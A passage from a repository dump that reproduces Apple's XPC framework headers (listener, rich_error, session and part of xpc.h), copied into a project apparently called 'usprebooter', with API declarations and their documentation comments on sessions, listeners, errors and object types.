will point to an * {@link xpc_rich_error_t} describing the details of any errors that occurred. * * @result * Returns whether listener activation succeeded. * * @discussion * xpc_listener_activate must not be called on a listener that has been already * activated. Releasing the last reference on an inactive listener that was * created with an xpc_listener_create() is undefined. */ API_AVAILABLE(macos(14.0), ios(17.0), tvos(17.0), watchos(10.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT bool xpc_listener_activate(xpc_listener_t listener, xpc_rich_error_t _Nullable * _Nullable error_out); /*! * @function xpc_listener_cancel * Cancels a listener. * * @param listener * The listener object to cancel. * * @discussion * Cancellation is asynchronous and non-preemptive. * * Cancelling a listener will cause peers attempting to connect * to the service to hang. In general, a listener does not need * to be explicitly cancelled and the process can safely terminate * without cancelling the listener. */ API_AVAILABLE(macos(14.0), ios(17.0), tvos(17.0), watchos(10.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT void xpc_listener_cancel(xpc_listener_t listener); /*! * @function xpc_listener_reject_peer * Rejects the incoming peer session * * @param peer * The peer session object to reject. This must be a session that was an argument * from an incoming session handler block * * @param reason * The reason that the peer was rejected * * @discussion * The peer session will be cancelled and cannot be used after it has been rejected */ API_AVAILABLE(macos(14.0), ios(17.0), tvos(17.0), watchos(10.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT void xpc_listener_reject_peer(xpc_session_t peer, const char *reason); __END_DECLS XPC_ASSUME_NONNULL_END #endif // __XPC_LISTENER_H__ ================================================ FILE: usprebooter/Private Headers I stole from the macOS SDK/xpc/rich_error.h ================================================ #ifndef __XPC_RICH_ERROR_H__ #define __XPC_RICH_ERROR_H__ #ifndef __XPC_INDIRECT__ #error "Please #include instead of this file directly." // For HeaderDoc. #include "base.h" #endif // __XPC_INDIRECT__ #ifndef __BLOCKS__ #error "XPC Rich Errors require Blocks support." #endif // __BLOCKS__ XPC_ASSUME_NONNULL_BEGIN __BEGIN_DECLS #pragma mark Properties /*! * @function xpc_rich_error_copy_description * Copy the string description of an error. * * @param error * The error to be examined. * * @result * The underlying C string for the provided error. This string should be * disposed of with free(3) when done. * * This will return NULL if a string description could not be generated. */ XPC_EXPORT XPC_WARN_RESULT char * _Nullable xpc_rich_error_copy_description(xpc_rich_error_t error); /*! * @function xpc_rich_error_can_retry * Whether the operation the error originated from can be retried. * * @param error * The error to be inspected. * * @result * Whether the operation the error originated from can be retried. */ XPC_EXPORT XPC_WARN_RESULT bool xpc_rich_error_can_retry(xpc_rich_error_t error); __END_DECLS XPC_ASSUME_NONNULL_END #endif // __XPC_RICH_ERROR_H__ ================================================ FILE: usprebooter/Private Headers I stole from the macOS SDK/xpc/session.h ================================================ #ifndef __XPC_SESSION_H__ #define __XPC_SESSION_H__ #ifndef __XPC_INDIRECT__ #error "Please #include instead of this file directly." // For HeaderDoc. #include "base.h" #endif // __XPC_INDIRECT__ #ifndef __BLOCKS__ #error "XPC Session require Blocks support." #endif // __BLOCKS__ XPC_ASSUME_NONNULL_BEGIN __BEGIN_DECLS #pragma mark Constants /*! * @typedef xpc_session_create_flags_t * Constants representing different options available when creating an XPC * Session. * * @const XPC_SESSION_CREATE_INACTIVE * Indicates that the session should not be activated during its creation. The * returned session must be manually activated using * {@link xpc_session_activate} before it can be used. * * @const XPC_SESSION_CREATE_MACH_PRIVILEGED * Passed to {@link xpc_session_create_mach_service} to indicate that the job * advertising the service name in its launchd.plist(5) should be in the * privileged Mach bootstrap. This is typically accomplished by placing your * launchd.plist(5) in /Library/LaunchDaemons. */ XPC_SWIFT_NOEXPORT XPC_FLAGS_ENUM(xpc_session_create_flags, uint64_t, XPC_SESSION_CREATE_NONE XPC_SWIFT_NAME("none") = 0, XPC_SESSION_CREATE_INACTIVE XPC_SWIFT_NAME("inactive") = (1 << 0), XPC_SESSION_CREATE_MACH_PRIVILEGED XPC_SWIFT_NAME("privileged") = (1 << 1) ); #pragma mark Handlers typedef void (^xpc_session_cancel_handler_t)(xpc_rich_error_t error) XPC_SWIFT_NOEXPORT; typedef void (^xpc_session_incoming_message_handler_t)(xpc_object_t message) XPC_SWIFT_NOEXPORT; typedef void (^xpc_session_reply_handler_t)(xpc_object_t _Nullable reply, xpc_rich_error_t _Nullable error) XPC_SWIFT_NOEXPORT; #pragma mark Helpers /*! * @function xpc_session_copy_description * Copy the string description of the session. * * @param session * The session to be examined. * * @result * The underlying C string description for the provided session. This string * should be disposed of with free(3) when done. This will return NULL if a * string description could not be generated. */ API_AVAILABLE(macos(13.0), ios(16.0), tvos(16.0), watchos(9.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT XPC_WARN_RESULT char * _Nullable xpc_session_copy_description(xpc_session_t session); #pragma mark Client Session Creation /*! * @function xpc_session_create_xpc_service * Creates a new session object representing a connection to the named service. * * @param name * The name of the service to create a session with. * * @param target_queue * The GCD queue onto which session events will be submitted. This may be a * concurrent queue. This parameter may be NULL, in which case the target queue * will be libdispatch's default target queue, defined as * DISPATCH_TARGET_QUEUE_DEFAULT. * * @param flags * Additional attributes which which to create the session. * * @param error_out * An out-parameter that, if set and in the event of an error, will point to an * {@link xpc_rich_error_t} describing the details of any errors that occurred. * * @result * On success this returns a new session object. The returned session is * activated by default and can be used to send messages. The caller is * responsible for disposing of the returned object with {@link xpc_release} * when it is no longer needed. On failure this will return NULL and if set, * error_out will be set to an error describing the failure. * * @discussion * This will fail if the specified XPC service is either not found or is * unavailable. */ API_AVAILABLE(macos(13.0), ios(16.0), tvos(16.0), watchos(9.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_session_t _Nullable xpc_session_create_xpc_service(const char *name, dispatch_queue_t _Nullable target_queue, xpc_session_create_flags_t flags, xpc_rich_error_t _Nullable * _Nullable error_out); /*! * @function xpc_session_create_mach_service * Creates a session with the service defined by the provided Mach service name. * * @param mach_service * The Mach service to create a session with. The service name must exist in the * Mach bootstrap that is accessible to the process and be advertised in a * launchd.plist. * * @param target_queue * The GCD queue onto which session events will be submitted. This may be a * concurrent queue. This parameter may be NULL, in which case the target queue * will be libdispatch's default target queue, defined as * DISPATCH_TARGET_QUEUE_DEFAULT. * * @param flags * Additional attributes which which to create the session. * * @param error_out * An out-parameter that, if set and in the event of an error, will point to an * {@link xpc_rich_error_t} describing the details of any errors that occurred. * * @param cancel_handler * The cancel handler block that will be executed when this session is canceled. * * @result * On success this returns a new session object. The returned session is * activated by default and can be used to send messages. The caller is * responsible for disposing of the returned object with {@link xpc_release} * when it is no longer needed. On failure this will return NULL and if set, * error_out will be set to an error describing the failure. * * @discussion * This will fail if the specified Mach service is either not found in the * bootstrap or is otherwise unavailable. * */ API_AVAILABLE(macos(13.0), ios(16.0), tvos(16.0), watchos(9.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_session_t _Nullable xpc_session_create_mach_service(const char *mach_service, dispatch_queue_t _Nullable target_queue, xpc_session_create_flags_t flags, xpc_rich_error_t _Nullable * _Nullable error_out); #pragma mark Session Configuration /*! * @function xpc_session_set_incoming_message_handler * Set an incoming message handler for a session. * * @param session * The session to set the handler for. * * @param handler * The handler block to be called when a message originated by the peer is * received through the provided session. * * @discussion * This can only be called on an inactive session. Calling this on a session * with an existing event handler will replace it. */ API_AVAILABLE(macos(13.0), ios(16.0), tvos(16.0), watchos(9.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT void xpc_session_set_incoming_message_handler(xpc_session_t session, xpc_session_incoming_message_handler_t handler); /*! * @function xpc_session_set_cancel_handler * Set the cancel handler for a session. * * @param session * The session to set the cancel handler for. * * @param cancel_handler * The cancel handler block that will be executed when this session is canceled. * * @discussion * This can only be called on an inactive session. Calling this on a session * with an existing cancel handler will replace the existing cancel handler with * the one provided. */ API_AVAILABLE(macos(13.0), ios(16.0), tvos(16.0), watchos(9.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT void xpc_session_set_cancel_handler(xpc_session_t session, xpc_session_cancel_handler_t cancel_handler); /*! * @function xpc_session_set_target_queue * Set the target queue for a session. * * @param session * The session to set the target queue for. * * @param target_queue * The GCD queue onto which session events will be submitted. This may be a * concurrent queue. This parameter may be NULL, in which case the target queue * will be libdispatch's default target queue, defined as * DISPATCH_TARGET_QUEUE_DEFAULT. * * @discussion * This can only be called on an inactive session. Calling this on a session * with an existing target queue will replace the existing target queue with * the one provided. */ API_AVAILABLE(macos(14.0), ios(17.0), tvos(17.0), watchos(10.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT void xpc_session_set_target_queue(xpc_session_t session, dispatch_queue_t _Nullable target_queue); #pragma mark Lifecycle /*! * @function xpc_session_activate * Activates a session. * * @param session * The session object to activate. * * @param error_out * An out-parameter that, if set and in the event of an error, will point to an * {@link xpc_rich_error_t} describing the details of any errors that occurred. * * @result * Returns whether session activation succeeded. * * @discussion * xpc_session_activate must not be called on a session that has been already * activated. Releasing the last reference on an inactive session that was * created with an xpc_session_create*() will trigger an API misuse crash. * * If activation fails, the session is automatically cancelled. */ API_AVAILABLE(macos(13.0), ios(16.0), tvos(16.0), watchos(9.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT bool xpc_session_activate(xpc_session_t session, xpc_rich_error_t _Nullable * _Nullable error_out); /*! * @function xpc_session_cancel * Cancels the session. After this call, any messages that have not yet been * sent will be discarded, and the connection will be unwound. If there are * messages that are awaiting replies, they will have their reply handlers * invoked with an appropriate {@link xpc_rich_error_t}. * * @param session * The session object to cancel. * * @discussion * Session must have been activated to be canceled. Cancellation is asynchronous * and non-preemptive. */ API_AVAILABLE(macos(13.0), ios(16.0), tvos(16.0), watchos(9.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT void xpc_session_cancel(xpc_session_t session); #pragma mark Message Send /*! * @function xpc_session_send_message * Sends a message over the session to the destination service. * * @param session * The session to send the message over. * * @param message * The message to send. This must be a dictionary object. * * @result * In the event of an error this will return an {@link xpc_rich_error_t} * detailing the reasons for the failure. On success this return value will be * NULL. * * @discussion * Messages are delivered in FIFO order. This API is safe to call from multiple * GCD queues. There is no indication that a message was delivered successfully. * This is because even once the message has been successfully enqueued on the * remote end, there are no guarantees about when the runtime will dequeue the * message and invoke the other session's event handler block. * * If this is invoked on an inactive session, one created using the * XPC_SESSION_CREATE_INACTIVE flag and hasn't yet been activated, the process * will crash. */ API_AVAILABLE(macos(13.0), ios(16.0), tvos(16.0), watchos(9.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_rich_error_t _Nullable xpc_session_send_message(xpc_session_t session, xpc_object_t message); /*! * @function xpc_session_send_message_with_reply_sync * Sends a message over the session to the destination service and blocks the * caller until a reply is received. * * @param session * The session over which the message will be sent. * * @param message * The message to send. This must be a dictionary object. * * @param error_out * If this parameter is provided, in the event of a failure it will point to an * {@link xpc_rich_error_t} describing the details of the error. * * @result * On success, this will return the reply message as an {@link xpc_object_t}. * Otherwise NULL is returned. * * @discussion * This API supports priority inversion avoidance and should be used instead of * combining xpc_session_send_message_with_reply_async with a semaphore. * * If this is invoked on an inactive session, for example one created using the * XPC_SESSION_CREATE_INACTIVE flag that hasn't yet been activated, the process * will crash. * * Invoking this API while the target queue is blocked would lead to deadlocks * in certain scenarios. For that reason, invoking it from the target queue * results in a crash. * * Be judicious about your use of this API. It can block indefinitely, so if you * are using it to implement an API that can be called from the main queue, you * may wish to consider allowing the API to take a queue and callback block so * that results may be delivered asynchronously if possible. */ API_AVAILABLE(macos(13.0), ios(16.0), tvos(16.0), watchos(9.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_object_t _Nullable xpc_session_send_message_with_reply_sync(xpc_session_t session, xpc_object_t message, xpc_rich_error_t _Nullable * _Nullable error_out); /*! * @function xpc_session_send_message_with_reply_async * Sends a message over the session to the destination service and executes the * provided callback when a reply is received. * * @param session * The session over which the message will be sent. * * @param message * The message to send. This must be a dictionary object. * * @param reply_handler * The handler block to invoke when a reply to the message is received from the * session. If the session is torn down before the reply was received, for * example if the remote service exits prematurely, this handler will be * executed and passed an appropriate {@link xpc_rich_error_t} object describing * the failure. * * @discussion * If this is invoked on an inactive session, for example one created using the * XPC_SESSION_CREATE_INACTIVE flag that hasn't yet been activated, the process * will crash. * * If this is invoked on a cancelled session, this will generate a simulated * crash. */ API_AVAILABLE(macos(13.0), ios(16.0), tvos(16.0), watchos(9.0)) XPC_EXPORT XPC_SWIFT_NOEXPORT void xpc_session_send_message_with_reply_async(xpc_session_t session, xpc_object_t message, xpc_session_reply_handler_t reply_handler); __END_DECLS XPC_ASSUME_NONNULL_END #endif // __XPC_SESSION_H__ ================================================ FILE: usprebooter/Private Headers I stole from the macOS SDK/xpc/xpc.h ================================================ // Copyright (c) 2009-2020 Apple Inc. All rights reserved. #ifndef __XPC_H__ #define __XPC_H__ #include #include #include #include #include #include #include #include #include #include #include #include #include #ifndef __XPC_INDIRECT__ #define __XPC_INDIRECT__ #endif // __XPC_INDIRECT__ #include "base.h" #if __has_include() #include #else // __has_include() #define XPC_TRANSACTION_DEPRECATED #endif // __has_include() XPC_ASSUME_NONNULL_BEGIN __BEGIN_DECLS #ifndef __OSX_AVAILABLE_STARTING #define __OSX_AVAILABLE_STARTING(x, y) #endif // __OSX_AVAILABLE_STARTING #define XPC_API_VERSION 20200610 /*! * @typedef xpc_type_t * A type that describes XPC object types. */ typedef const struct _xpc_type_s * xpc_type_t; #ifndef XPC_TYPE #define XPC_TYPE(type) const struct _xpc_type_s type #endif // XPC_TYPE /*! * @typedef xpc_object_t * A type that can describe all XPC objects. Dictionaries, arrays, strings, etc. * are all described by this type. * * XPC objects are created with a retain count of 1, and therefore it is the * caller's responsibility to call xpc_release() on them when they are no longer * needed. */ #if OS_OBJECT_USE_OBJC /* By default, XPC objects are declared as Objective-C types when building with * an Objective-C compiler. This allows them to participate in ARC, in RR * management by the Blocks runtime and in leaks checking by the static * analyzer, and enables them to be added to Cocoa collections. * * See for details. */ OS_OBJECT_DECL(xpc_object); #ifndef XPC_DECL #define XPC_DECL(name) typedef xpc_object_t name##_t #endif // XPC_DECL #define XPC_GLOBAL_OBJECT(object) ((OS_OBJECT_BRIDGE xpc_object_t)&(object)) #define XPC_RETURNS_RETAINED OS_OBJECT_RETURNS_RETAINED XPC_INLINE XPC_NONNULL_ALL void _xpc_object_validate(xpc_object_t object) { (void)*(unsigned long volatile *)(OS_OBJECT_BRIDGE void *)object; } #else // OS_OBJECT_USE_OBJC typedef void * xpc_object_t; #define XPC_DECL(name) typedef struct _##name##_s * name##_t #define XPC_GLOBAL_OBJECT(object) (&(object)) #define XPC_RETURNS_RETAINED #endif // OS_OBJECT_USE_OBJC /*! * @typedef xpc_handler_t * The type of block that is accepted by the XPC connection APIs. * * @param object * An XPC object that is to be handled. If there was an error, this object will * be equal to one of the well-known XPC_ERROR_* dictionaries and can be * compared with the equality operator. * * @discussion * You are not responsible for releasing the event object. */ #if __BLOCKS__ typedef void (^xpc_handler_t)(xpc_object_t object); #endif // __BLOCKS__ /*! * @define XPC_TYPE_CONNECTION * A type representing a connection to a named service. This connection is * bidirectional and can be used to both send and receive messages. A * connection carries the credentials of the remote service provider. */ #define XPC_TYPE_CONNECTION (&_xpc_type_connection) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_connection); XPC_DECL(xpc_connection); /*! * @typedef xpc_connection_handler_t * The type of the function that will be invoked for a bundled XPC service when * there is a new connection on the service. * * @param connection * A new connection that is equivalent to one received by a listener connection. * See the documentation for {@link xpc_connection_set_event_handler} for the * semantics associated with the received connection. */ typedef void (*xpc_connection_handler_t)(xpc_connection_t connection); /*! * @define XPC_TYPE_ENDPOINT * A type representing a connection in serialized form. Unlike a connection, an * endpoint is an inert object that does not have any runtime activity * associated with it. Thus, it is safe to pass an endpoint in a message. Upon * receiving an endpoint, the recipient can use * xpc_connection_create_from_endpoint() to create as many distinct connections * as desired. */ #define XPC_TYPE_ENDPOINT (&_xpc_type_endpoint) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_endpoint); XPC_DECL(xpc_endpoint); /*! * @define XPC_TYPE_NULL * A type representing a null object. This type is useful for disambiguating * an unset key in a dictionary and one which has been reserved but set empty. * Also, this type is a way to represent a "null" value in dictionaries, which * do not accept NULL. */ #define XPC_TYPE_NULL (&_xpc_type_null) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_null); /*! * @define XPC_TYPE_BOOL * A type representing a Boolean value. */ #define XPC_TYPE_BOOL (&_xpc_type_bool) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_bool); /*! * @define XPC_BOOL_TRUE * A constant representing a Boolean value of true. You may compare a Boolean * object against this constant to determine its value. */ #define XPC_BOOL_TRUE XPC_GLOBAL_OBJECT(_xpc_bool_true) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT const struct _xpc_bool_s _xpc_bool_true; /*! * @define XPC_BOOL_FALSE * A constant representing a Boolean value of false. You may compare a Boolean * object against this constant to determine its value. */ #define XPC_BOOL_FALSE XPC_GLOBAL_OBJECT(_xpc_bool_false) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT const struct _xpc_bool_s _xpc_bool_false; /*! * @define XPC_TYPE_INT64 * A type representing a signed, 64-bit integer value. */ #define XPC_TYPE_INT64 (&_xpc_type_int64) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_int64); /*! * @define XPC_TYPE_UINT64 * A type representing an unsigned, 64-bit integer value. */ #define XPC_TYPE_UINT64 (&_xpc_type_uint64) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_uint64); /*! * @define XPC_TYPE_DOUBLE * A type representing an IEEE-compliant, double-precision floating point value. */ #define XPC_TYPE_DOUBLE (&_xpc_type_double) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_double); /*! * @define XPC_TYPE_DATE * A type representing a date interval. The interval is with respect to the * Unix epoch. XPC dates are in Unix time and are thus unaware of local time * or leap seconds. */ #define XPC_TYPE_DATE (&_xpc_type_date) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_date); /*! * @define XPC_TYPE_DATA * A type representing a an arbitrary buffer of bytes. */ #define XPC_TYPE_DATA (&_xpc_type_data) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_data); /*! * @define XPC_TYPE_STRING * A type representing a NUL-terminated C-string. */ #define XPC_TYPE_STRING (&_xpc_type_string) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_string); /*! * @define XPC_TYPE_UUID * A type representing a Universally Unique Identifier as defined by uuid(3). */ #define XPC_TYPE_UUID (&_xpc_type_uuid) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_uuid); /*! * @define XPC_TYPE_FD * A type representing a POSIX file descriptor. */ #define XPC_TYPE_FD (&_xpc_type_fd) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_fd); /*! * @define XPC_TYPE_SHMEM * A type representing a region of shared memory. */ #define XPC_TYPE_SHMEM (&_xpc_type_shmem) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_shmem); /*! * @define XPC_TYPE_ARRAY * A type representing an array of XPC objects. This array must be contiguous, * i.e. it cannot contain NULL values. If you wish to indicate that a slot * is empty, you can insert a null object. The array will grow as needed to * accommodate more objects. */ #define XPC_TYPE_ARRAY (&_xpc_type_array) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_array); /*! * @define XPC_TYPE_DICTIONARY * A type representing a dictionary of XPC objects, keyed off of C-strings. * You may insert NULL values into this collection. The dictionary will grow * as needed to accommodate more key/value pairs. */ #define XPC_TYPE_DICTIONARY (&_xpc_type_dictionary) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_dictionary); /*! * @define XPC_TYPE_ERROR * A type representing an error object. Errors in XPC are dictionaries, but * xpc_get_type() will return this type when given an error object. You * cannot create an error object directly; XPC will only give them to handlers. * These error objects have pointer values that are constant across the lifetime * of your process and can be safely compared. * * These constants are enumerated in the header for the connection object. Error * dictionaries may reserve keys so that they can be queried to obtain more * detailed information about the error. Currently, the only reserved key is * XPC_ERROR_KEY_DESCRIPTION. */ #define XPC_TYPE_ERROR (&_xpc_type_error) __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_TYPE(_xpc_type_error); /*! * @define XPC_ERROR_KEY_DESCRIPTION * In an error dictionary, querying for this key will return a string object * that describes the error in a human-readable way. */ #define XPC_ERROR_KEY_DESCRIPTION _xpc_error_key_description __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT const char * const _xpc_error_key_description; /*! * @define XPC_EVENT_KEY_NAME * In an event dictionary, this querying for this key will return a string * object that describes the event. */ #define XPC_EVENT_KEY_NAME _xpc_event_key_name __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT const char * const _xpc_event_key_name; /*! * @define XPC_TYPE_SESSION * * @discussion * Sessions represent a stateful connection between a client and a service. When either end of the connection * disconnects, the entire session will be invalidated. In this case the system will make no attempt to * reestablish the connection or relaunch the service. * * Clients can initiate a session with a service that accepts xpc_connection_t connections but session * semantics will be maintained. * */ #define XPC_TYPE_SESSION (&_xpc_type_session) XPC_EXPORT XPC_TYPE(_xpc_type_session); XPC_DECL(xpc_session); /*! * @define XPC_TYPE_RICH_ERROR * * @discussion * Rich errors provide a simple dynamic error type that can indicate whether an * error is retry-able or not. */ #define XPC_TYPE_RICH_ERROR (&_xpc_type_rich_error) XPC_EXPORT XPC_TYPE(_xpc_type_rich_error); XPC_DECL(xpc_rich_error); __END_DECLS XPC_ASSUME_NONNULL_END #if !defined(__XPC_BUILDING_XPC__) || !__XPC_BUILDING_XPC__ #include "endpoint.h" #include "debug.h" #if __BLOCKS__ #include "activity.h" #include "xpc_connection.h" #include "rich_error.h" #include "session.h" #include "listener.h" #endif // __BLOCKS__ #undef __XPC_INDIRECT__ #include "launch.h" #endif // !defined(__XPC_BUILDING_XPC__) || !__XPC_BUILDING_XPC__ XPC_ASSUME_NONNULL_BEGIN __BEGIN_DECLS #pragma mark XPC Object Protocol /*! * @function xpc_retain * * @abstract * Increments the reference count of an object. * * @param object * The object which is to be manipulated. * * @result * The object which was given. * * @discussion * Calls to xpc_retain() must be balanced with calls to xpc_release() * to avoid leaking memory. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 xpc_object_t xpc_retain(xpc_object_t object); #if OS_OBJECT_USE_OBJC_RETAIN_RELEASE #undef xpc_retain #define xpc_retain(object) ({ xpc_object_t _o = (object); \ _xpc_object_validate(_o); [_o retain]; }) #endif // OS_OBJECT_USE_OBJC_RETAIN_RELEASE /*! * @function xpc_release * * @abstract * Decrements the reference count of an object. * * @param object * The object which is to be manipulated. * * @discussion * The caller must take care to balance retains and releases. When creating or * retaining XPC objects, the creator obtains a reference on the object. Thus, * it is the caller's responsibility to call xpc_release() on those objects when * they are no longer needed. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 void xpc_release(xpc_object_t object); #if OS_OBJECT_USE_OBJC_RETAIN_RELEASE #undef xpc_release #define xpc_release(object) ({ xpc_object_t _o = (object); \ _xpc_object_validate(_o); [_o release]; }) #endif // OS_OBJECT_USE_OBJC_RETAIN_RELEASE /*! * @function xpc_get_type * * @abstract * Returns the type of an object. * * @param object * The object to examine. * * @result * An opaque pointer describing the type of the object. This pointer is suitable * direct comparison to exported type constants with the equality operator. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL XPC_WARN_RESULT xpc_type_t xpc_get_type(xpc_object_t object); /*! * @function xpc_type_get_name * * @abstract * Returns a string describing an XPC object type. * * @param type * The type to describe. * * @result * A string describing the type of an object, like "string" or "int64". * This string should not be freed or modified. */ __OSX_AVAILABLE_STARTING(__MAC_10_15, __IPHONE_13_0) XPC_EXPORT XPC_NONNULL1 const char * xpc_type_get_name(xpc_type_t type); /*! * @function xpc_copy * * @abstract * Creates a copy of the object. * * @param object * The object to copy. * * @result * The new object. NULL if the object type does not support copying or if * sufficient memory for the copy could not be allocated. Service objects do * not support copying. * * @discussion * When called on an array or dictionary, xpc_copy() will perform a deep copy. * * The object returned is not necessarily guaranteed to be a new object, and * whether it is will depend on the implementation of the object being copied. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL_ALL XPC_WARN_RESULT XPC_RETURNS_RETAINED xpc_object_t _Nullable xpc_copy(xpc_object_t object); /*! * @function xpc_equal * * @abstract * Compares two objects for equality. * * @param object1 * The first object to compare. * * @param object2 * The second object to compare. * * @result * Returns true if the objects are equal, otherwise false. Two objects must be * of the same type in order to be equal. * * For two arrays to be equal, they must contain the same values at the * same indexes. For two dictionaries to be equal, they must contain the same * values for the same keys. * * Two objects being equal implies that their hashes (as returned by xpc_hash()) * are also equal. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_NONNULL2 XPC_WARN_RESULT bool xpc_equal(xpc_object_t object1, xpc_object_t object2); /*! * @function xpc_hash * * @abstract * Calculates a hash value for the given object. * * @param object * The object for which to calculate a hash value. This value may be modded * with a table size for insertion into a dictionary-like data structure. * * @result * The calculated hash value. * * @discussion * Note that the computed hash values for any particular type and value of an * object can change from across releases and platforms and should not be * assumed to be constant across all time and space or stored persistently. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_NONNULL1 XPC_WARN_RESULT size_t xpc_hash(xpc_object_t object); /*! * @function xpc_copy_description * * @abstract * Copies a debug string describing the object. * * @param object * The object which is to be examined. * * @result * A string describing object which contains information useful for debugging. * This string should be disposed of with free(3) when done. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_WARN_RESULT XPC_NONNULL1 char * xpc_copy_description(xpc_object_t object); #pragma mark XPC Object Types #pragma mark Null /*! * @function xpc_null_create * * @abstract * Creates an XPC object representing the null object. * * @result * A new null object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_object_t xpc_null_create(void); #pragma mark Boolean /*! * @function xpc_bool_create * * @abstract * Creates an XPC Boolean object. * * @param value * The Boolean primitive value which is to be boxed. * * @result * A new Boolean object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_object_t xpc_bool_create(bool value); /*! * @function xpc_bool_get_value * * @abstract * Returns the underlying Boolean value from the object. * * @param xbool * The Boolean object which is to be examined. * * @result * The underlying Boolean value or false if the given object was not an XPC * Boolean object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT bool xpc_bool_get_value(xpc_object_t xbool); #pragma mark Signed Integer /*! * @function xpc_int64_create * * @abstract * Creates an XPC signed integer object. * * @param value * The signed integer value which is to be boxed. * * @result * A new signed integer object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_object_t xpc_int64_create(int64_t value); /*! * @function xpc_int64_get_value * * @abstract * Returns the underlying signed 64-bit integer value from an object. * * @param xint * The signed integer object which is to be examined. * * @result * The underlying signed 64-bit value or 0 if the given object was not an XPC * integer object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 int64_t xpc_int64_get_value(xpc_object_t xint); #pragma mark Unsigned Integer /*! * @function xpc_uint64_create * * @abstract * Creates an XPC unsigned integer object. * * @param value * The unsigned integer value which is to be boxed. * * @result * A new unsigned integer object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT xpc_object_t xpc_uint64_create(uint64_t value); /*! * @function xpc_uint64_get_value * * @abstract * Returns the underlying unsigned 64-bit integer value from an object. * * @param xuint * The unsigned integer object which is to be examined. * * @result * The underlying unsigned integer value or 0 if the given object was not an XPC * unsigned integer object. */ __OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0) XPC_EXPORT XPC_WARN_RESULT XPC_NONNULL1 uint64_t xpc_uint64_get_value(xpc_object_t xuint); #pragma mark Double /*! * @function xpc_double_create 